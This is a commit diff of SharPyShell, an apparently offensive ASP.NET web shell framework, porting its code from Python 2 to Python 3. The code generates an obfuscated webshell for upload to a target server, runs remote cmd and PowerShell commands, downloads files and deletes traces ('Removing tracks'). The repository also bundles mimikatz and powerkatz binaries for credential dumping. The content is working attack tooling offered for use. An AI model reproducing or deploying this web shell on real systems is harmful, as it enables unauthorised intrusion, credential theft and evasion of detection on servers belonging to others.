STRLCPY/SharPyShell

■ ■ ■ ■ ■ ■

.gitignore

	1	+	#custom ignores
	2	+
1	3		*.pyc
2	4		.idea/
	5	+	venv/
3	6
4	7		# exclude everything
5	8		output/*
6	9		# exception to the rule
7	10		!output/.gitkeep
8	11
	12	+
	13	+	# Visual Studio template
	14	+
	15	+	## Ignore Visual Studio temporary files, build results, and
	16	+	## files generated by popular Visual Studio add-ons.
	17	+	##
	18	+	## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
	19	+
	20	+	# User-specific files
	21	+	*.rsuser
	22	+	*.suo
	23	+	*.user
	24	+	*.userosscache
	25	+	*.sln.docstates
	26	+
	27	+	# User-specific files (MonoDevelop/Xamarin Studio)
	28	+	*.userprefs
	29	+
	30	+	# Mono auto generated files
	31	+	mono_crash.*
	32	+
	33	+	# Build results
	34	+	[Dd]ebug/
	35	+	[Dd]ebugPublic/
	36	+	[Rr]elease/
	37	+	[Rr]eleases/
	38	+	x64/
	39	+	x86/
	40	+	[Ww][Ii][Nn]32/
	41	+	[Aa][Rr][Mm]/
	42	+	[Aa][Rr][Mm]64/
	43	+	bld/
	44	+	[Bb]in/
	45	+	[Oo]bj/
	46	+	[Ll]og/
	47	+	[Ll]ogs/
	48	+
	49	+	# Visual Studio 2015/2017 cache/options directory
	50	+	.vs/
	51	+	# Uncomment if you have tasks that create the project's static files in wwwroot
	52	+	#wwwroot/
	53	+
	54	+	# Visual Studio 2017 auto generated files
	55	+	Generated\ Files/
	56	+
	57	+	# MSTest test Results
	58	+	[Tt]est[Rr]esult*/
	59	+	[Bb]uild[Ll]og.*
	60	+
	61	+	# NUnit
	62	+	*.VisualState.xml
	63	+	TestResult.xml
	64	+	nunit-*.xml
	65	+
	66	+	# Build Results of an ATL Project
	67	+	[Dd]ebugPS/
	68	+	[Rr]eleasePS/
	69	+	dlldata.c
	70	+
	71	+	# Benchmark Results
	72	+	BenchmarkDotNet.Artifacts/
	73	+
	74	+	# .NET Core
	75	+	project.lock.json
	76	+	project.fragment.lock.json
	77	+	artifacts/
	78	+
	79	+	# ASP.NET Scaffolding
	80	+	ScaffoldingReadMe.txt
	81	+
	82	+	# StyleCop
	83	+	StyleCopReport.xml
	84	+
	85	+	# Files built by Visual Studio
	86	+	*_i.c
	87	+	*_p.c
	88	+	*_h.h
	89	+	*.ilk
	90	+	*.meta
	91	+	*.obj
	92	+	*.iobj
	93	+	*.pch
	94	+	*.pdb
	95	+	*.ipdb
	96	+	*.pgc
	97	+	*.pgd
	98	+	*.rsp
	99	+	*.sbr
	100	+	*.tlb
	101	+	*.tli
	102	+	*.tlh
	103	+	*.tmp
	104	+	*.tmp_proj
	105	+	*_wpftmp.csproj
	106	+	*.log
	107	+	*.tlog
	108	+	*.vspscc
	109	+	*.vssscc
	110	+	.builds
	111	+	*.pidb
	112	+	*.svclog
	113	+	*.scc
	114	+
	115	+	# Chutzpah Test files
	116	+	_Chutzpah*
	117	+
	118	+	# Visual C++ cache files
	119	+	ipch/
	120	+	*.aps
	121	+	*.ncb
	122	+	*.opendb
	123	+	*.opensdf
	124	+	*.sdf
	125	+	*.cachefile
	126	+	*.VC.db
	127	+	*.VC.VC.opendb
	128	+
	129	+	# Visual Studio profiler
	130	+	*.psess
	131	+	*.vsp
	132	+	*.vspx
	133	+	*.sap
	134	+
	135	+	# Visual Studio Trace Files
	136	+	*.e2e
	137	+
	138	+	# TFS 2012 Local Workspace
	139	+	$tf/
	140	+
	141	+	# Guidance Automation Toolkit
	142	+	*.gpState
	143	+
	144	+	# ReSharper is a .NET coding add-in
	145	+	_ReSharper*/
	146	+	*.[Rr]e[Ss]harper
	147	+	*.DotSettings.user
	148	+
	149	+	# TeamCity is a build add-in
	150	+	_TeamCity*
	151	+
	152	+	# DotCover is a Code Coverage Tool
	153	+	*.dotCover
	154	+
	155	+	# AxoCover is a Code Coverage Tool
	156	+	.axoCover/*
	157	+	!.axoCover/settings.json
	158	+
	159	+	# Coverlet is a free, cross platform Code Coverage Tool
	160	+	coverage*.json
	161	+	coverage*.xml
	162	+	coverage*.info
	163	+
	164	+	# Visual Studio code coverage results
	165	+	*.coverage
	166	+	*.coveragexml
	167	+
	168	+	# NCrunch
	169	+	_NCrunch_*
	170	+	.crunch.local.xml
	171	+	nCrunchTemp_*
	172	+
	173	+	# MightyMoose
	174	+	.mm.
	175	+	AutoTest.Net/
	176	+
	177	+	# Web workbench (sass)
	178	+	.sass-cache/
	179	+
	180	+	# Installshield output folder
	181	+	[Ee]xpress/
	182	+
	183	+	# DocProject is a documentation generator add-in
	184	+	DocProject/buildhelp/
	185	+	DocProject/Help/*.HxT
	186	+	DocProject/Help/*.HxC
	187	+	DocProject/Help/*.hhc
	188	+	DocProject/Help/*.hhk
	189	+	DocProject/Help/*.hhp
	190	+	DocProject/Help/Html2
	191	+	DocProject/Help/html
	192	+
	193	+	# Click-Once directory
	194	+	publish/
	195	+
	196	+	# Publish Web Output
	197	+	*.[Pp]ublish.xml
	198	+	*.azurePubxml
	199	+	# Note: Comment the next line if you want to checkin your web deploy settings,
	200	+	# but database connection strings (with potential passwords) will be unencrypted
	201	+	*.pubxml
	202	+	*.publishproj
	203	+
	204	+	# Microsoft Azure Web App publish settings. Comment the next line if you want to
	205	+	# checkin your Azure Web App publish settings, but sensitive information contained
	206	+	# in these scripts will be unencrypted
	207	+	PublishScripts/
	208	+
	209	+	# NuGet Packages
	210	+	*.nupkg
	211	+	# NuGet Symbol Packages
	212	+	*.snupkg
	213	+	# The packages folder can be ignored because of Package Restore
	214	+	*/[Pp]ackages/
	215	+	# except build/, which is used as an MSBuild target.
	216	+	!**/[Pp]ackages/build/
	217	+	# Uncomment if necessary however generally it will be regenerated when needed
	218	+	#!**/[Pp]ackages/repositories.config
	219	+	# NuGet v3's project.json files produces more ignorable files
	220	+	*.nuget.props
	221	+	*.nuget.targets
	222	+
	223	+	# Nuget personal access tokens and Credentials
	224	+	nuget.config
	225	+
	226	+	# Microsoft Azure Build Output
	227	+	csx/
	228	+	*.build.csdef
	229	+
	230	+	# Microsoft Azure Emulator
	231	+	ecf/
	232	+	rcf/
	233	+
	234	+	# Windows Store app package directories and files
	235	+	AppPackages/
	236	+	BundleArtifacts/
	237	+	Package.StoreAssociation.xml
	238	+	_pkginfo.txt
	239	+	*.appx
	240	+	*.appxbundle
	241	+	*.appxupload
	242	+
	243	+	# Visual Studio cache files
	244	+	# files ending in .cache can be ignored
	245	+	*.[Cc]ache
	246	+	# but keep track of directories ending in .cache
	247	+	!?*.[Cc]ache/
	248	+
	249	+	# Others
	250	+	ClientBin/
	251	+	~$*
	252	+	*~
	253	+	*.dbmdl
	254	+	*.dbproj.schemaview
	255	+	*.jfm
	256	+	*.pfx
	257	+	*.publishsettings
	258	+	orleans.codegen.cs
	259	+
	260	+	# Including strong name files can present a security risk
	261	+	# (https://github.com/github/gitignore/pull/2483#issue-259490424)
	262	+	#*.snk
	263	+
	264	+	# Since there are multiple workflows, uncomment next line to ignore bower_components
	265	+	# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
	266	+	#bower_components/
	267	+
	268	+	# RIA/Silverlight projects
	269	+	Generated_Code/
	270	+
	271	+	# Backup & report files from converting an old project file
	272	+	# to a newer Visual Studio version. Backup files are not needed,
	273	+	# because we have git ;-)
	274	+	_UpgradeReport_Files/
	275	+	Backup*/
	276	+	UpgradeLog*.XML
	277	+	UpgradeLog*.htm
	278	+	ServiceFabricBackup/
	279	+	*.rptproj.bak
	280	+
	281	+	# SQL Server files
	282	+	*.mdf
	283	+	*.ldf
	284	+	*.ndf
	285	+
	286	+	# Business Intelligence projects
	287	+	*.rdl.data
	288	+	*.bim.layout
	289	+	.bim_.settings
	290	+	*.rptproj.rsuser
	291	+	*- [Bb]ackup.rdl
	292	+	*- [Bb]ackup ([0-9]).rdl
	293	+	*- [Bb]ackup ([0-9][0-9]).rdl
	294	+
	295	+	# Microsoft Fakes
	296	+	FakesAssemblies/
	297	+
	298	+	# GhostDoc plugin setting file
	299	+	*.GhostDoc.xml
	300	+
	301	+	# Node.js Tools for Visual Studio
	302	+	.ntvs_analysis.dat
	303	+	node_modules/
	304	+
	305	+	# Visual Studio 6 build log
	306	+	*.plg
	307	+
	308	+	# Visual Studio 6 workspace options file
	309	+	*.opt
	310	+
	311	+	# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
	312	+	*.vbw
	313	+
	314	+	# Visual Studio LightSwitch build output
	315	+	*/.HTMLClient/GeneratedArtifacts
	316	+	*/.DesktopClient/GeneratedArtifacts
	317	+	*/.DesktopClient/ModelManifest.xml
	318	+	*/.Server/GeneratedArtifacts
	319	+	*/.Server/ModelManifest.xml
	320	+	_Pvt_Extensions
	321	+
	322	+	# Paket dependency manager
	323	+	.paket/paket.exe
	324	+	paket-files/
	325	+
	326	+	# FAKE - F# Make
	327	+	.fake/
	328	+
	329	+	# CodeRush personal settings
	330	+	.cr/personal
	331	+
	332	+	# Python Tools for Visual Studio (PTVS)
	333	+	__pycache__/
	334	+	*.pyc
	335	+
	336	+	# Cake - Uncomment if you are using it
	337	+	# tools/**
	338	+	# !tools/packages.config
	339	+
	340	+	# Tabs Studio
	341	+	*.tss
	342	+
	343	+	# Telerik's JustMock configuration file
	344	+	*.jmconfig
	345	+
	346	+	# BizTalk build output
	347	+	*.btp.cs
	348	+	*.btm.cs
	349	+	*.odx.cs
	350	+	*.xsd.cs
	351	+
	352	+	# OpenCover UI analysis results
	353	+	OpenCover/
	354	+
	355	+	# Azure Stream Analytics local run output
	356	+	ASALocalRun/
	357	+
	358	+	# MSBuild Binary and Structured Log
	359	+	*.binlog
	360	+
	361	+	# NVidia Nsight GPU debugger configuration file
	362	+	*.nvuser
	363	+
	364	+	# MFractors (Xamarin productivity tool) working folder
	365	+	.mfractor/
	366	+
	367	+	# Local History for Visual Studio
	368	+	.localhistory/
	369	+
	370	+	# BeatPulse healthcheck temp database
	371	+	healthchecksdb
	372	+
	373	+	# Backup folder for Package Reference Convert tool in Visual Studio 2017
	374	+	MigrationBackup/
	375	+
	376	+	# Ionide (cross platform F# VS Code tools) working folder
	377	+	.ionide/
	378	+
	379	+	# Fody - auto-generated XML schema
	380	+	FodyWeavers.xsd
	381	+
	382	+	# VS Code files for those working on multiple tools
	383	+	.vscode/*
	384	+	!.vscode/settings.json
	385	+	!.vscode/tasks.json
	386	+	!.vscode/launch.json
	387	+	!.vscode/extensions.json
	388	+	*.code-workspace
	389	+
	390	+	# Local History for Visual Studio Code
	391	+	.history/
	392	+
	393	+	# Windows Installer files from build outputs
	394	+	*.cab
	395	+	*.msi
	396	+	*.msix
	397	+	*.msm
	398	+	*.msp
	399	+
	400	+	# JetBrains Rider
	401	+	.idea/
	402	+	*.sln.iml

■ ■ ■ ■ ■ ■

README.md

		skipped 16 lines
17	17
18	18		## Requirements
19	19
20		-	Python version >= 2.7
	20	+	Python version >= 3.6
21	21
22	22		and
23	23
24	24		```
25		-	pip install -r requirements.txt
	25	+	pip3 install -r requirements.txt
26	26		```
27	27
28	28		## Description
		skipped 107 lines

■ ■ ■ ■ ■ ■

SharPyShell.py

1		-	#!/usr/bin/env python2
	1	+	#!/usr/bin/env python3
2	2
3	3		from core.Generate import Generate
4	4		from core.SharPyShellPrompt import SharPyShellPrompt
		skipped 139 lines
144	144
145	145
146	146		if __name__ == '__main__':
147		-	print config.banner
	147	+	print (config.banner)
148	148		parser = argparse.ArgumentParser(prog='SharPyShell', formatter_class=argparse.RawTextHelpFormatter,
149	149		epilog=example_text_main)
150	150		parser.add_argument('--version', action='version', version=config.header)
		skipped 2 lines
153	153		create_interact_parser(subparsers)
154	154		args = parser.parse_args()
155	155
156		-	if args.mode == 'generate':
157		-	generate_obj = Generate(args.password, args.encryption, args.obfuscator, args.endian_type, args.output)
158		-	generate_obj.generate()
	156	+	if args.__contains__('mode'):
	157	+	if args.mode == 'generate':
	158	+	generate_obj = Generate(args.password, args.encryption, args.obfuscator, args.endian_type, args.output)
	159	+	generate_obj.generate()
159	160
160		-	if args.mode == 'interact':
161		-	prompt = SharPyShellPrompt(args.password, args.encryption, args.default_shell, args.url,
162		-	args.user_agent, args.cookies, args.custom_header, args.insecure, args.proxy)
163		-	prompt.cmdloop('\n')
	161	+	if args.mode == 'interact':
	162	+	prompt = SharPyShellPrompt(args.password, args.encryption, args.default_shell, args.url,
	163	+	args.user_agent, args.cookies, args.custom_header, args.insecure, args.proxy)
	164	+	prompt.cmdloop('\n')
	165	+	else:
	166	+	parser.print_help()
164	167

■ ■ ■ ■ ■ ■

core/ChannelAES.py

1	1		from utils.Singleton import Singleton
2	2		from Crypto.Cipher import AES
	3	+	from Crypto.Util.Padding import pad
	4	+	from Crypto.Util.Padding import unpad
3	5
4	6
5	7		class ChannelAES(Singleton):
		skipped 2 lines
8	10		BS = 16
9	11
10	12		def __init__(self, password):
11		-	self.hashed_password = password.decode('hex')
	13	+	self.hashed_password = bytes.fromhex(password)
12	14		self.IV = self.hashed_password[0:self.BS]
13	15
14	16		def encrypt(self, plain_data):
15		-	pad = lambda s: s + (self.BS - len(s) % self.BS) * chr(self.BS - len(s) % self.BS)
16		-	plain_data_pad = pad(plain_data)
	17	+	plain_data_pad = pad(plain_data, self.BS)
17	18		aes = AES.new(self.hashed_password, AES.MODE_CBC, self.IV)
18	19		encrypted_data = aes.encrypt(plain_data_pad)
19	20		return encrypted_data
20	21
21	22		def decrypt(self, encrypted_data):
22	23		aes = AES.new(self.hashed_password, AES.MODE_CBC, self.IV)
23		-	unpad = lambda s: s[:-ord(s[len(s) - 1:])]
24	24		decrypted_data = aes.decrypt(encrypted_data)
25		-	return unpad(decrypted_data)
	25	+	return unpad(decrypted_data, self.BS)
	26	+

■ ■ ■ ■ ■ ■

core/ChannelXOR.py

1	1		from utils.Singleton import Singleton
2		-
	2	+	from itertools import cycle
3	3
4	4		class ChannelXOR(Singleton):
5	5		password = None
6	6
7	7		def __init__(self, password):
8		-	self.password = password.encode('utf-8')
	8	+	self.password = password
9	9
10	10		def encrypt(self, plain_data):
11		-	key = self.password
12		-	from itertools import izip, cycle
13		-	xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(plain_data, cycle(key)))
14		-	return bytearray(xored)
	11	+	key = self.password.encode()
	12	+	xored = b''.join(bytes([(x ^ y)]) for (x, y) in list(zip(plain_data, cycle(key))))
	13	+	return xored
15	14
16	15		def decrypt(self, encrypted_data):
17	16		return self.encrypt(encrypted_data)
	17	+

■ ■ ■ ■ ■ ■

core/Environment.py

		skipped 6 lines
7	7
8	8		_exception_class = GetTempDirectoryException
9	9
10		-	_runtime_code = ur"""
	10	+	_runtime_code = r"""
11	11		using System;using System.IO;using System.Diagnostics;using System.Text;
12	12		public class SharPyShell
13	13		{
		skipped 31 lines
45	45
46	46		_exception_class = GetEnvDirectoryException
47	47
48		-	_runtime_code = ur"""
	48	+	_runtime_code = r"""
49	49		using System;using System.IO;using System.Diagnostics;using System.Text;
50	50		using System.Security.AccessControl;using System.Security.Principal;
51	51
		skipped 49 lines
101	101
102	102		_exception_class = ClearDirectoriesException
103	103
104		-	_runtime_code = ur"""
	104	+	_runtime_code = r"""
105	105		using System;using System.IO;using System.Diagnostics;using System.Text;
106	106		public class SharPyShell
107	107		{
		skipped 90 lines
198	198		excluded_path = ['env_directory', 'working_directory']
199	199		modules_path = ['@"' + v + '"' for k, v in env_settings.items() if k not in excluded_path]
200	200		modules_path_string_array = '{' + ','.join(modules_path) + '}'
201		-	print '\nRemoving tracks....\n'
	201	+	print ('\nRemoving tracks....\n')
202	202		result = self.clear_dir_obj.run([modules_path_string_array, env_directory])
203	203		if '{{{ClearDirectoriesException}}}' not in result:
204	204		result = format_output(result)
		skipped 4 lines

■ ■ ■ ■ ■ ■

core/Generate.py

1	1		from core import config
2	2		from struct import unpack
	3	+	from itertools import cycle
3	4		import hashlib
4	5		import random
5		-
	6	+	import io
	7	+	import os
6	8
7	9		class Generate():
8	10
		skipped 2 lines
11	13		__obfuscator = ''
12	14		__endian_type = ''
13	15
14		-	__templates_path = config.sharpyshell_path+'agent/'
15		-	__runtime_compiler_path = __templates_path + 'runtime_compiler/'
	16	+	__templates_path = config.sharpyshell_path+'agent'+os.sep
	17	+	__runtime_compiler_path = __templates_path + 'runtime_compiler'+os.sep
16	18		__output_path = config.output_path + 'sharpyshell.aspx'
17	19
18	20		def __init__(self, password, encryption, obfuscator, endian_type, output):
	21	+	password = password.encode('utf-8')
19	22		if encryption == 'aes128':
20	23		self.__password = hashlib.md5(password).hexdigest()
21	24		else:
		skipped 19 lines
41	44
42	45		def __generate_webshell_code_encrypted_dll(self, template_code):
43	46		def xor_file(path, key):
44		-	with open(path, 'rb') as file_handle:
	47	+	with io.open(path, mode='rb') as file_handle:
45	48		plain_data = file_handle.read()
46		-	from itertools import izip, cycle
47		-	xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(plain_data, cycle(key)))
48		-	return bytearray(xored)
49		-
50		-	def generate_byte_file_string(byte_arr):
51		-	output = [str(hex(byte)) for byte in byte_arr]
52		-	return '{' + ",".join(output) + '}'
	49	+	xored = []
	50	+	for (x, y) in list(zip(plain_data, cycle(key))):
	51	+	xored.append(hex(x ^ ord(y)))
	52	+	return '{' + ",".join(xored) + '}'
53	53
54	54		if 'aes' in self.__encryption:
55	55		dll_name = 'runtime_compiler_aes.dll'
		skipped 1 lines
57	57		dll_name = 'runtime_compiler_xor.dll'
58	58		runtime_compiler_dll_path = self.__runtime_compiler_path + dll_name
59	59		obfuscated_dll = xor_file(runtime_compiler_dll_path, self.__password)
60		-	obfuscated_dll_string = generate_byte_file_string(obfuscated_dll)
61	60		webshell_code = template_code.replace('{{SharPyShell_Placeholder_pwd}}', self.__password)
62		-	webshell_code = webshell_code.replace('{{SharPyShell_Placeholder_enc_dll}}', obfuscated_dll_string)
	61	+	webshell_code = webshell_code.replace('{{SharPyShell_Placeholder_enc_dll}}', obfuscated_dll)
63	62		return webshell_code
64	63
65	64		def __generate_webshell_code_ulong_compression(self, template_code):
66	65		def get_dll_code(dll_code_path):
67		-	with open(dll_code_path, 'r') as file_handle:
	66	+	with open(dll_code_path, 'rb') as file_handle:
68	67		dll_code = file_handle.read()
69	68		return dll_code
70	69
		skipped 8 lines
79	78		representation = '='
80	79		for i in range(0, len(dll_code), 8):
81	80		int_conversion = unpack(representation + 'Q', dll_code[i:i + 8])[0]
82		-	ulong_quotients.append(str(int_conversion / divisor))
	81	+	ulong_quotients.append(str(int_conversion // divisor))
83	82		ulong_remainders.append(str(int_conversion % divisor))
84	83		ulong_quotients_string = '{' + ','.join(ulong_quotients) + '}'
85	84		ulong_remainders_string = '{' + ','.join(ulong_remainders) + '}'
		skipped 23 lines
109	108		webshell_output_path = self.__output_path
110	109		with open(webshell_output_path, 'w') as file_handle:
111	110		file_handle.write(webshell_code)
112		-	print 'SharPyShell webshell written correctly to: ' + webshell_output_path
113		-	print '\nUpload it to the target server and let\'s start having some fun :) \n\n'
	111	+	print ('SharPyShell webshell written correctly to: ' + webshell_output_path)
	112	+	print ('\nUpload it to the target server and let\'s start having some fun :) \n\n')
114	113

■ ■ ■ ■ ■ ■

core/Module.py

		skipped 19 lines
20	20		"""
21	21		'''runtime_code must have the class name "SharPyShell" and the main function name "ExecRuntime". The ExecRuntime
22	22		function will be the code run on the server and it must return results in byte[] type '''
23		-	_runtime_code = ur"""
	23	+	_runtime_code = r"""
24	24		using System;using System.IO;using System.Diagnostics;using System.Text;
25	25		public class SharPyShell
26	26		{
		skipped 29 lines
56	56		# End Override this method
57	57
58	58		def _encrypt_request(self, request_clear):
59		-	request_encrypted = self._channel_enc_obj.encrypt(request_clear)
	59	+	request_encrypted = self._channel_enc_obj.encrypt(request_clear.encode())
60	60		request_encrypted_encoded = base64.b64encode(request_encrypted)
61		-	return request_encrypted_encoded
	61	+	return request_encrypted_encoded.decode()
62	62
63	63		def _post_request(self, request_encrypted_encoded):
64	64		response_status_code, response_headers, response_text = \
65	65		self._request_object.send_request(request_encrypted_encoded)
66	66		if response_status_code != 200:
67		-	raise self._exception_class('{{{' + self._exception_class.__name__ + '}}}\n' +
	67	+	raise self._exception_class('{{{' + str(self._exception_class.__name__) + '}}}\n' +
68	68		str(response_headers) + '\n\n' +
69		-	response_text)
	69	+	str(response_text))
70	70		return response_text
71	71
72	72		def _decrypt_response(self, encrypted_response_encoded):
		skipped 2 lines
75	75		return response_clear
76	76
77	77		def _parse_response(self, response):
	78	+	response = response.decode() if isinstance(response, bytes) else response
78	79		if '{{{' + self._exception_class.__name__ + '}}}' in response:
79	80		raise self._exception_class(str(response))
80	81		if '{{{SharPyShellError}}}' in response or '{{{PythonError}}}' in response:
		skipped 17 lines

■ ■ ■ ■ ■ ■

core/Request.py

	1	+	from utils.Singleton import Singleton
1	2		from utils.Singleton import Singleton
2	3		import ssl
3	4		import urllib3
		skipped 50 lines

■ ■ ■ ■ ■ ■

core/SharPyShellPrompt.py

1		-	import config
	1	+	from core import config
2	2		from cmd import Cmd
3	3		import os
4	4		import glob
5	5		import sys
	6	+	import importlib
6	7		import shlex
7	8		import hashlib
8	9		import signal
	10	+	import platform
9	11		from utils import prettify
10	12		from utils.normalize_args import normalize_args
11	13		from utils.random_string import random_generator
		skipped 16 lines
28	30
29	31		def __init__(self, password, channel_enc_mode, default_shell, url, user_agent,
30	32		cookies, custom_headers, insecure_ssl, proxy):
31		-	reload(sys)
32		-	sys.setdefaultencoding('utf8')
33		-	signal.signal(signal.SIGTSTP, lambda s, f: self.do_quit())
	33	+	importlib.reload(sys)
	34	+	#sys.setdefaultencoding('utf8')
	35	+	password = password.encode('utf-8')
	36	+	if platform.system() == 'Windows':
	37	+	signal.signal(signal.SIGTERM, lambda s, f: self.do_quit())
	38	+	else:
	39	+	signal.signal(signal.SIGTSTP, lambda s, f: self.do_quit())
34	40		Cmd.__init__(self)
35	41		if channel_enc_mode == 'aes128':
36	42		self.password = hashlib.md5(password).hexdigest()
		skipped 43 lines
80	86		return self.emptyline()
81	87		if cmd.startswith('#'):
82	88		response = self.onecmd_custom(cmd.lstrip('#'), args)
83		-	print response
	89	+	print (response)
84	90		return response
85	91		if cmd in self.helper_commands:
86	92		func = getattr(self, 'do_' + cmd.lstrip('#'))
		skipped 26 lines
113	119		"""Change the current working directory."""
114	120		working_directory = self.modules_settings['working_directory']
115	121		if arg == "" or arg == " " or arg == '.':
116		-	print working_directory
	122	+	print (working_directory)
117	123		return
118	124		if arg == '..':
119	125		arg = working_directory.split('\\')
		skipped 7 lines
127	133		elif len(arg) > 0:
128	134		arg = '\\'.join(arg)
129	135		else:
130		-	print "Empty Path."
	136	+	print ("Empty Path.")
131	137		return
132	138		else:
133	139		if '/' in arg:
		skipped 9 lines
143	149		if '{{{SharPyShellError}}}' not in response:
144	150		self.modules_settings['working_directory'] = arg
145	151		else:
146		-	print response
	152	+	print (response)
147	153		return response
148	154
149	155		def do_help(self, arg):
150	156		"""List available commands."""
151	157		if arg and arg.lstrip('#') in self.modules_loaded_tree:
152		-	print self.modules_loaded[arg.lstrip('#')].complete_help
	158	+	print (self.modules_loaded[arg.lstrip('#')].complete_help)
153	159		else:
154		-	print "\n\n" + self.doc_header + "\n"
	160	+	print ("\n\n" + self.doc_header + "\n")
155	161		data = [['\nCommands\n', '\nDesc\n']]
156	162		for module_name in sorted(self.modules_loaded_tree):
157	163		data.append(['#%s' % module_name, self.modules_loaded[module_name].short_help])
158		-	print prettify.tablify(data, table_border=False)
	164	+	print (prettify.tablify(data, table_border=False))
159	165		print
160		-	print "\n" + "SharPyShell Helper Commands:" + "\n"
	166	+	print ("\n" + "SharPyShell Helper Commands:" + "\n")
161	167		data = [['\nCommands\n', '\nDesc\n']]
162	168		for module_name in sorted(self.helper_commands):
163	169		data.append(['%s' % module_name, getattr(self, 'do_'+module_name).__doc__])
164		-	print prettify.tablify(data, table_border=False)
	170	+	print (prettify.tablify(data, table_border=False))
165	171		print
166	172
167	173		def complete_help(self, text, line, start_index, end_index):
		skipped 49 lines
217	223		return
218	224		# Clean trailing newline if existent to prettify output
219	225		result = result[:-1] if (
220		-	isinstance(result, basestring) and
	226	+	isinstance(result, str) and
221	227		result.endswith('\n')
222	228		) else result
223		-	print result
	229	+	print (result)
224	230
225	231		def cmdloop(self, intro=None):
226	232		"""Repeatedly issue a prompt, accept input, parse an initial prefix
		skipped 24 lines
251	257		else:
252	258		if self.use_rawinput:
253	259		try:
254		-	line = raw_input(self.prompt)
	260	+	line = input(self.prompt)
255	261		except EOFError:
256	262		line = 'EOF'
257	263		else:
		skipped 21 lines
279	285		def do_quit(self, args=[]):
280	286		"""Quit the program."""
281	287		if self.online:
282		-	print "\n\nQuitting...\n"
283		-	print self.env_obj.clear_env(self.modules_settings)
	288	+	print ("\n\nQuitting...\n")
	289	+	print (self.env_obj.clear_env(self.modules_settings))
284	290		else:
285		-	print args[0] + "\n\n\nTarget Offline...\n"
	291	+	print (args[0] + "\n\n\nTarget Offline...\n")
286	292		raise SystemExit
287	293
288	294		def do_exit(self, args=[]):
		skipped 3 lines

■ ■ ■ ■ ■ ■

core/config.py

1	1		import sys
2	2		import os
3	3
4		-	sharpyshell_version='1.2.1'
	4	+	sharpyshell_version='1.3'
5	5
6	6		header = '#SharPyShell v' + sharpyshell_version + ' - @splinter_code'
7	7		banner = """
		skipped 11 lines
19	19
20	20		""" % header
21	21
22		-	sharpyshell_path=os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
	22	+	sharpyshell_path=os.path.dirname(os.path.realpath(sys.argv[0])) + os.sep
23	23		sys.path.insert(0, sharpyshell_path)
24		-	modules_paths=sharpyshell_path + 'modules/'
25		-	output_path=sharpyshell_path + 'output/'
	24	+	modules_paths=sharpyshell_path + 'modules' + os.sep
	25	+	output_path=sharpyshell_path + 'output' + os.sep
26	26

modules/dll/powerkatz.dll

Binary file.

■ ■ ■ ■ ■ ■

modules/download.py

		skipped 1 lines
2	2		from core import config
3	3		import ntpath
4	4		import traceback
	5	+	from time import sleep
5	6
6	7
7	8		class DownloadModuleException(ModuleException):
		skipped 15 lines
23	24		Positional arguments:
24	25		remote_input_path The file path you want to download from the remote server
25	26		local_output_path The path where the file will be saved on your local machine
26		-	Default: 'output/' directory of Sharpyshell directory
	27	+	Default: 'output' directory of Sharpyshell directory
27	28		chunk_size The maximum limit of a chunk to be transferred over the network
28	29		Default: 102400
29	30
		skipped 6 lines
36	37		#download C:\windows\system32\cmd.exe /home/user/cmd.exe 1024
37	38		"""
38	39
39		-	_runtime_code = ur"""
	40	+	_runtime_code = r"""
40	41		using System;using System.IO;using System.Diagnostics;using System.Text;
41	42		public class SharPyShell{
42	43		public byte[] Download(string arg){
		skipped 13 lines
56	57		}
57	58		"""
58	59
59		-	__runtime_code_split_file = ur"""
	60	+	__runtime_code_split_file = r"""
60	61		using System;using System.IO;using System.Diagnostics;using System.Text;
61	62		public class SharPyShell{
62	63		public byte[] Download(string arg, int chunk, int offset){
		skipped 16 lines
79	80		}
80	81		"""
81	82
82		-	__runtime_code_get_file_size = ur"""
	83	+	__runtime_code_get_file_size = r"""
83	84		using System;using System.IO;using System.Diagnostics;using System.Text;
84	85		public class SharPyShell{
85	86		string GetFileSize(string path){
		skipped 29 lines
115	116		file_open_mode = 'ab'
116	117		else:
117	118		file_open_mode = 'wb'
118		-	with open(output_path, file_open_mode) as outfile:
119		-	outfile.write(file_content)
	119	+	try:
	120	+	with open(output_path, file_open_mode) as outfile:
	121	+	outfile.write(file_content)
	122	+	# tune for Windows race condition on file access when the chunk_size is very small, weird...
	123	+	except PermissionError:
	124	+	sleep(1)
	125	+	with open(output_path, file_open_mode) as outfile:
	126	+	outfile.write(file_content)
120	127		output = "File Downloaded correctly to " + output_path
121	128		return output
122	129
		skipped 40 lines
163	170		encrypted_request = self._encrypt_request(req)
164	171		encrypted_response = self._post_request(encrypted_request)
165	172		decrypted_response = self._decrypt_response(encrypted_response)
166		-	file_content = self._parse_response(decrypted_response)
	173	+	file_content = decrypted_response
167	174		if len(requests) > 1:
168	175		parsed_response = self.__write_local_file(file_content, download_output_path, split=True)
169		-	print 'Chunk ' + str(i + 1) + ' --> ' + str(chunk_size * i) + ' - ' +\
170		-	str(chunk_size * i + chunk_size) + ' bytes written correctly to ' + download_output_path
	176	+	print ('Chunk ' + str(i + 1) + ' --> ' + str(chunk_size * i) + ' - ' +\
	177	+	str(chunk_size * i + chunk_size) + ' bytes written correctly to ' + download_output_path)
171	178		else:
172	179		parsed_response = self.__write_local_file(file_content, download_output_path)
173	180		except ModuleException as module_exc:
		skipped 6 lines

modules/exe_modules/mimikatz.exe

Binary file.

■ ■ ■ ■ ■ ■

modules/exec_cmd.py

		skipped 29 lines
30	30		#exec_cmd echo test > C:\Windows\Temp\test.txt
31	31		"""
32	32
33		-	_runtime_code = ur"""
	33	+	_runtime_code = r"""
34	34		using System;using System.IO;using System.Diagnostics;using System.Text;
35	35		public class SharPyShell
36	36		{
		skipped 46 lines

■ ■ ■ ■ ■ ■

modules/exec_ps.py

		skipped 31 lines
32	32
33	33		"""
34	34
35		-	_runtime_code = ur"""
	35	+	_runtime_code = r"""
36	36		using System;using System.IO;using System.Diagnostics;using System.Text;
37	37		public class SharPyShell
38	38		{
		skipped 41 lines
80	80		if '""' in cmd:
81	81		cmd = cmd.replace('""', '"')
82	82		cmd = '$ProgressPreference = "SilentlyContinue";' + cmd
83		-	cmd = b64encode(cmd.encode('UTF-16LE'))
	83	+	cmd = str(b64encode(cmd.encode('UTF-16LE')), 'UTF-8')
84	84		working_path = self._module_settings['working_directory']
85	85		return self._runtime_code % (cmd, working_path)
86	86
		skipped 2 lines

■ ■ ■ ■ ■ ■

